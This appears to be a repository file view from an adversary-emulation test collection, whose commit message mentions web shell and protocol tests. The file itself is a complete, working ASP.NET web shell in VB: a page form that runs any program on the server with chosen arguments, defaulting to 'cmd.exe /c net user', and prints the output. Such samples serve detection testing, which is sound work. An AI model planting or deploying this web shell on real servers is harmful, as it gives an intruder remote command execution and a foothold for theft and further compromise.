0c3e47f7be
* Technique - T1071 First commit of T1071 - Standard Application Layer Protocols. Specifically using powershell & Curl to simulate malicious user agents. * Web Shell Simple test of copying webshells from atomic dir to a path on the file system. * typo * Generate docs from job=validate_atomics_generate_docs branch=web
38 lines
1.3 KiB
Plaintext
38 lines
1.3 KiB
Plaintext
<%@ Page Language="VB" Debug="true" %>
|
|
<%@ import Namespace="system.IO" %>
|
|
<%@ import Namespace="System.Diagnostics" %>
|
|
|
|
<script runat="server">
|
|
|
|
Sub RunCmd(Src As Object, E As EventArgs)
|
|
Dim myProcess As New Process()
|
|
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
|
|
myProcessStartInfo.UseShellExecute = false
|
|
myProcessStartInfo.RedirectStandardOutput = true
|
|
myProcess.StartInfo = myProcessStartInfo
|
|
myProcessStartInfo.Arguments=xcmd.text
|
|
myProcess.Start()
|
|
|
|
Dim myStreamReader As StreamReader = myProcess.StandardOutput
|
|
Dim myString As String = myStreamReader.Readtoend()
|
|
myProcess.Close()
|
|
mystring=replace(mystring,"<","<")
|
|
mystring=replace(mystring,">",">")
|
|
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
|
|
End Sub
|
|
|
|
</script>
|
|
|
|
<html>
|
|
<body>
|
|
<form runat="server">
|
|
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
|
|
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
|
|
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
|
|
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
|
|
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
|
|
<p><asp:Label id="result" runat="server"></asp:Label>
|
|
</form>
|
|
</body>
|
|
</html>
|